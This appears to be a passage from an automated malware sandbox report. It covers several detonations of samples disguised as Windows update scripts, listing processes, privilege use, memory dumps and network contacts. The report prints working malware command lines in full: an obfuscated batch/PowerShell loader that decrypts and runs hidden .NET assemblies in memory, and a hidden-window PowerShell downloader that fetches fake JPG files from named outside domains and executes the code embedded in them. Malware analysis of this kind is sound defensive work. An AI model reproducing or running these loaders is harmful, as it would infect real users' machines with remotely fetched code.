| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\windows_update\update.cmd"
C:\Windows\system32\cmd.exe
cmd /c \"set __=^&rem\
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\windows_update\update.cmd
C:\Windows\system32\cmd.exe
cmd /c \"set __=^&rem\
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\windows_update\update.cmd';$LILq='LGNGQoGNGQadGNGQ'.Replace('GNGQ', ''),'ElevbZPmvbZPenvbZPtvbZPAvbZPtvbZP'.Replace('vbZP', ''),'InUMsVvoUMsVkUMsVeUMsV'.Replace('UMsV', ''),'CopFijyyTFijyoFijy'.Replace('Fijy', ''),'CZakhhaZakhnZakhgeEZakhxtZakhenZakhsZakhioZakhnZakh'.Replace('Zakh', ''),'ReyUhbayUhbdyUhbLiyUhbnesyUhb'.Replace('yUhb', ''),'SOZpUplOZpUitOZpU'.Replace('OZpU', ''),'TrMlaCanMlaCsMlaCfMlaCoMlaCrMlaCmFiMlaCnalMlaCBlMlaCockMlaC'.Replace('MlaC', ''),'MaXOkGiXOkGnXOkGModXOkGulXOkGeXOkG'.Replace('XOkG', ''),'EnkMdetrykMdePokMdeinkMdetkMde'.Replace('kMde', ''),'FrwpnfomwpnfBawpnfse6wpnf4Stwpnfrwpnfingwpnf'.Replace('wpnf', ''),'GemcvPtCmcvPurmcvPrmcvPenmcvPtPrmcvPocmcvPessmcvP'.Replace('mcvP', ''),'DecxpgKoxpgKmxpgKpxpgKresxpgKsxpgK'.Replace('xpgK', ''),'CrtTyceattTycetTycDetTyccrtTycypttTycortTyc'.Replace('tTyc', '');powershell -w hidden;function aPNpf($nVNGI){$htbMs=[System.Security.Cryptography.Aes]::Create();$htbMs.Mode=[System.Security.Cryptography.CipherMode]::CBC;$htbMs.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$htbMs.Key=[System.Convert]::($LILq[10])('/MlRmzNe+ZzBdBywbWhCQRBk9F+NMckIyZTwiuahK6M=');$htbMs.IV=[System.Convert]::($LILq[10])('XI44fhXZ241HbBx9GSgTSw==');$jJhvE=$htbMs.($LILq[13])();$EHnru=$jJhvE.($LILq[7])($nVNGI,0,$nVNGI.Length);$jJhvE.Dispose();$htbMs.Dispose();$EHnru;}function vSJcW($nVNGI){$EemcA=New-Object System.IO.MemoryStream(,$nVNGI);$NFsIp=New-Object System.IO.MemoryStream;$lBDbC=New-Object System.IO.Compression.GZipStream($EemcA,[IO.Compression.CompressionMode]::($LILq[12]));$lBDbC.($LILq[3])($NFsIp);$lBDbC.Dispose();$EemcA.Dispose();$NFsIp.Dispose();$NFsIp.ToArray();}$HrliX=[System.IO.File]::($LILq[5])([Console]::Title);$cGEtH=vSJcW (aPNpf ([Convert]::($LILq[10])([System.Linq.Enumerable]::($LILq[1])($HrliX, 5).Substring(2))));$IdyPm=vSJcW (aPNpf ([Convert]::($LILq[10])([System.Linq.Enumerable]::($LILq[1])($HrliX, 6).Substring(2))));[System.Reflection.Assembly]::($LILq[0])([byte[]]$IdyPm).($LILq[9]).($LILq[2])($null,$null);[System.Reflection.Assembly]::($LILq[0])([byte[]]$cGEtH).($LILq[9]).($LILq[2])($null,$null); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Network
Files
memory/2380-4-0x000000001B5B0000-0x000000001B892000-memory.dmp
memory/2380-5-0x0000000001F00000-0x0000000001F08000-memory.dmp
memory/2380-6-0x000007FEF5870000-0x000007FEF620D000-memory.dmp
memory/2380-7-0x0000000002CA0000-0x0000000002D20000-memory.dmp
memory/2380-8-0x000007FEF5870000-0x000007FEF620D000-memory.dmp
memory/2380-10-0x0000000002CA0000-0x0000000002D20000-memory.dmp
memory/2380-9-0x0000000002CA0000-0x0000000002D20000-memory.dmp
memory/2380-11-0x000007FEF5870000-0x000007FEF620D000-memory.dmp
memory/2380-12-0x0000000002CA0000-0x0000000002D20000-memory.dmp
memory/2380-13-0x0000000002CA0000-0x0000000002D20000-memory.dmp
memory/2380-14-0x0000000002CA0000-0x0000000002D20000-memory.dmp
memory/2380-15-0x0000000002CA0000-0x0000000002D20000-memory.dmp
Analysis: behavioral25
Detonation Overview
Submitted
2024-04-19 07:49
Reported
2024-04-19 07:52
Platform
win7-20240221-en
Max time kernel
119s
Max time network
124s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2176 wrote to memory of 2568 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2176 wrote to memory of 2568 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2176 wrote to memory of 2568 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2568 wrote to memory of 2440 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2568 wrote to memory of 2440 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2568 wrote to memory of 2440 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\windows_update\windows.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreB3DgTreGUDgTreYgBDDgTreGwDgTreaQBlDgTreG4DgTredDgTreDgTregDgTreD0DgTreIDgTreBODgTreGUDgTredwDgTretDgTreE8DgTreYgBqDgTreGUDgTreYwB0DgTreCDgTreDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBODgTreGUDgTredDgTreDgTreuDgTreFcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreDsDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCDgTreDgTrePQDgTregDgTreEcDgTreZQB0DgTreC0DgTreUgBhDgTreG4DgTreZDgTreBvDgTreG0DgTreIDgTreDgTretDgTreEkDgTrebgBwDgTreHUDgTredDgTreBPDgTreGIDgTreagBlDgTreGMDgTredDgTreDgTregDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCDgTreDgTreLQBDDgTreG8DgTredQBuDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTreuDgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreDsDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreDgTre0DgTreCgDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreByDgTreGUDgTredDgTreB1DgTreHIDgTrebgDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTregDgTreH0DgTreOwDgTregDgTreDgTre0DgTreCgDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTrebgBhDgTreG4DgTrebwBzDgTreGgDgTreaQBlDgTreGwDgTreZDgTreDgTreuDgTreHDgTreDgTrecgBvDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreMgDgTreuDgTreGoDgTrecDgTreBnDgTreD8DgTreMQDgTre2DgTreDYDgTreMQDgTre1DgTreDQDgTreNwDgTreyDgTreDUDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTrebgBhDgTreG4DgTrebwBzDgTreGgDgTreZDgTreDgTreuDgTreHDgTreDgTrecgBvDgTreC8DgTreZgBpDgTreGwDgTreZQBzDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNDgTreDgTre0DgTreDQDgTreMQDgTre3DgTreDIDgTreMwDgTrenDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreDgTre0DgTreCgDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTreLQBuDgTreGUDgTreIDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBUDgTreGUDgTreeDgTreB0DgTreC4DgTreRQBuDgTreGMDgTrebwBkDgTreGkDgTrebgBnDgTreF0DgTreOgDgTre6DgTreFUDgTreVDgTreBGDgTreDgDgTreLgBHDgTreGUDgTredDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreDQDgTreKDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreFMDgTreVDgTreBBDgTreFIDgTreVDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreRQBODgTreEQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreKQDgTre7DgTreCDgTreDgTreDQDgTreKDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreBpDgTreGYDgTreIDgTreDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwBlDgTreCDgTreDgTreMDgTreDgTregDgTreC0DgTreYQBuDgTreGQDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwB0DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreKwDgTre9DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTreuDgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreDsDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBDDgTreG8DgTrebgB2DgTreGUDgTrecgB0DgTreF0DgTreOgDgTre6DgTreEYDgTrecgBvDgTreG0DgTreQgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFIDgTreZQBmDgTreGwDgTreZQBjDgTreHQDgTreaQBvDgTreG4DgTreLgBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreXQDgTre6DgTreDoDgTreTDgTreBvDgTreGEDgTreZDgTreDgTreoDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreCDgTreDgTrePQDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreC4DgTreRwBlDgTreHQDgTreVDgTreB5DgTreHDgTreDgTreZQDgTreoDgTreCcDgTredDgTreBlDgTreHMDgTredDgTreBwDgTreG8DgTredwBlDgTreHIDgTrecwBoDgTreGUDgTrebDgTreBsDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBtDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreLgBHDgTreGUDgTredDgTreBNDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTreoDgTreCcDgTrebDgTreBhDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreQQBjDgTreGQDgTreZDgTreBnDgTreG8DgTreaQDgTrevDgTreHMDgTreZQBsDgTreGkDgTreZgDgTrevDgTreG8DgTrecgBwDgTreC4DgTreZDgTreBsDgTreGUDgTreaQBoDgTreHMDgTrebwBuDgTreGEDgTrebgDgTrevDgTreC8DgTreOgBzDgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTresDgTreCDgTreDgTreJwDgTrexDgTreCcDgTreLDgTreDgTregDgTreCcDgTreQQBkDgTreG8DgTreYgBlDgTreCcDgTreKQDgTrepDgTreH0DgTrefQDgTre=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://nanoshield.pro/new_image2.jpg?166154725', 'https://nanoshd.pro/files/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.Acddgoi/selif/orp.dleihsonan//:sptth', '1', 'Adobe'))}}"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | nanoshd.pro | udp |
| US | 8.8.8.8:53 | nanoshield.pro | udp |
| US | 172.67.203.108:443 | nanoshield.pro | tcp |
Files
memory/2568-4-0x000000001B290000-0x000000001B572000-memory.dmp
memory/2568-5-0x0000000002720000-0x0000000002728000-memory.dmp
memory/2568-6-0x000007FEF5C00000-0x000007FEF659D000-memory.dmp
memory/2568-7-0x00000000029E0000-0x0000000002A60000-memory.dmp
memory/2568-8-0x000007FEF5C00000-0x000007FEF659D000-memory.dmp
memory/2568-9-0x00000000029E0000-0x0000000002A60000-memory.dmp
memory/2568-12-0x00000000029E0000-0x0000000002A60000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WN54W9QYDH7SV6P2RPM7.temp
| MD5 | e54a3dae0ebf5e9a1a83f9349e73d978 |
| SHA1 | d482945d5f50abbd8fc26ec617de0aa2ca75507d |
| SHA256 | 21d8f68917b146ca3407b74ab7f62afa33652d52c667b5ec664310fe5de19aee |
| SHA512 | ae9a0ff56cc39a5d768ce747bc181e59b86c53d21d3bd8e614d42cbcb029446f4cf59ecfd9b5b678e71b58db4bc5e9af3c667bd9f2ed71b418fd7d6808a67c7f |
memory/2568-10-0x00000000029E0000-0x0000000002A60000-memory.dmp
memory/2440-17-0x000007FEF5C00000-0x000007FEF659D000-memory.dmp
memory/2440-18-0x0000000002650000-0x00000000026D0000-memory.dmp
memory/2440-19-0x000007FEF5C00000-0x000007FEF659D000-memory.dmp
memory/2440-21-0x0000000002650000-0x00000000026D0000-memory.dmp
memory/2440-20-0x0000000002650000-0x00000000026D0000-memory.dmp
memory/2568-22-0x000007FEF5C00000-0x000007FEF659D000-memory.dmp
memory/2568-23-0x00000000029E0000-0x0000000002A60000-memory.dmp
memory/2568-24-0x00000000029E0000-0x0000000002A60000-memory.dmp
memory/2568-25-0x00000000029E0000-0x0000000002A60000-memory.dmp
memory/2440-26-0x000000001AAB0000-0x000000001AAFE000-memory.dmp
memory/2440-27-0x000007FEF5C00000-0x000007FEF659D000-memory.dmp
memory/2568-28-0x00000000029E0000-0x0000000002A60000-memory.dmp
memory/2568-29-0x000007FEF5C00000-0x000007FEF659D000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-04-19 07:49
Reported
2024-04-19 07:52
Platform
win7-20240221-en
Max time kernel
118s
Max time network
123s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\windows_update\loader.ps1
Network
Files
memory/3068-4-0x000000001B2B0000-0x000000001B592000-memory.dmp
memory/3068-6-0x000007FEF5990000-0x000007FEF632D000-memory.dmp
memory/3068-5-0x00000000024D0000-0x00000000024D8000-memory.dmp
memory/3068-7-0x0000000002660000-0x00000000026E0000-memory.dmp
memory/3068-8-0x0000000002660000-0x00000000026E0000-memory.dmp
memory/3068-9-0x0000000002660000-0x00000000026E0000-memory.dmp
memory/3068-10-0x000007FEF5990000-0x000007FEF632D000-memory.dmp
memory/3068-11-0x0000000002660000-0x00000000026E0000-memory.dmp
memory/3068-12-0x000007FEF5990000-0x000007FEF632D000-memory.dmp
memory/3068-13-0x0000000002660000-0x00000000026E0000-memory.dmp
memory/3068-14-0x0000000002660000-0x00000000026E0000-memory.dmp
memory/3068-15-0x0000000002660000-0x00000000026E0000-memory.dmp
memory/3068-16-0x000007FEF5990000-0x000007FEF632D000-memory.dmp
memory/3068-17-0x0000000002660000-0x00000000026E0000-memory.dmp
Analysis: behavioral11
Detonation Overview
Submitted
2024-04-19 07:49
Reported
2024-04-19 07:52
Platform
win7-20240221-en
Max time kernel
146s
Max time network
124s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\windows_update\monitors.ps1
Network
Files
memory/2104-4-0x000000001B390000-0x000000001B672000-memory.dmp
memory/2104-5-0x00000000023E0000-0x00000000023E8000-memory.dmp
memory/2104-6-0x000007FEF5BB0000-0x000007FEF654D000-memory.dmp
memory/2104-7-0x000007FEF5BB0000-0x000007FEF654D000-memory.dmp
memory/2104-9-0x0000000002260000-0x00000000022E0000-memory.dmp
memory/2104-8-0x0000000002260000-0x00000000022E0000-memory.dmp
memory/2104-10-0x0000000002260000-0x00000000022E0000-memory.dmp
memory/2104-11-0x0000000002260000-0x00000000022E0000-memory.dmp
memory/2104-12-0x000007FEF5BB0000-0x000007FEF654D000-memory.dmp
memory/2104-13-0x0000000002260000-0x00000000022E0000-memory.dmp
memory/2104-14-0x0000000002260000-0x00000000022E0000-memory.dmp
memory/2104-15-0x0000000002260000-0x00000000022E0000-memory.dmp
memory/2104-16-0x0000000002260000-0x00000000022E0000-memory.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2024-04-19 07:49
Reported
2024-04-19 07:52
Platform
win10v2004-20240226-en
Max time kernel
142s
Max time network
159s
Command Line
Signatures
